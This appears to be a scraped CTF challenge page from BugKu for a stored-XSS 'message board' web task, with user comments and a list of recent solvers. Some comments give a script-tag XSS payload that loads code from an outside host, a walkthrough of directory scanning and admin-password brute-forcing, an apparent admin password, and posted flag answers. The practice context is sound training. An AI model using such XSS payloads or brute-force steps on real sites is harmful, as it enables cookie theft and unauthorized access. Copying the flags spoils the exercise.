留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 2916
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
dzss 1年前

db.sql怎么链接不上

回复 1

dzss 1年前

这个密码怎么得出来的 admin 011be4d65feac1a8

回复 0

lwq522725 1年前

sCRiPt/SrC=//i0.al/Logugk>

回复 0

qixi 1年前

直接放入xss平台地址留言就行了

回复 0
Jaylon 1年前

来个xss平台

回复 0

popoh 1年前

db.sql压根就没有

回复 5

songci 1年前

flag{750d33e925f6dbf1784a1a924c237534}

回复 0

19881191586 1年前

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 3

treasure11 1年前

....太难了

回复 0

mAns0nw0W 1年前

flag{0d25978069e52fed99591c5c19ca0663}

回复 0

APTX4869ZRC 1年前

BugKu真的很酷

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(17)

解题动态

Lmn13644482831 攻破了该题 15小时前
testkuber 攻破了该题 23小时前
vespercc 攻破了该题 23小时前
2457036664 攻破了该题 1天前
2790819062 攻破了该题 1天前
lunarbyside 攻破了该题 2天前
lon 攻破了该题 2天前
SUSAN777 攻破了该题 3天前
trapping 攻破了该题 3天前
派大星和海绵宝宝 攻破了该题 3天前
forces 攻破了该题 4天前
Eplum 攻破了该题 4天前
17807032991 攻破了该题 6天前
2424291222 攻破了该题 6天前
2424291112 攻破了该题 6天前
qianxin66 攻破了该题 7天前
TOTO1024 攻破了该题 7天前
Zhumeng 攻破了该题 7天前
2687821343 攻破了该题 8天前
Pixelw 攻破了该题 9天前
问题反馈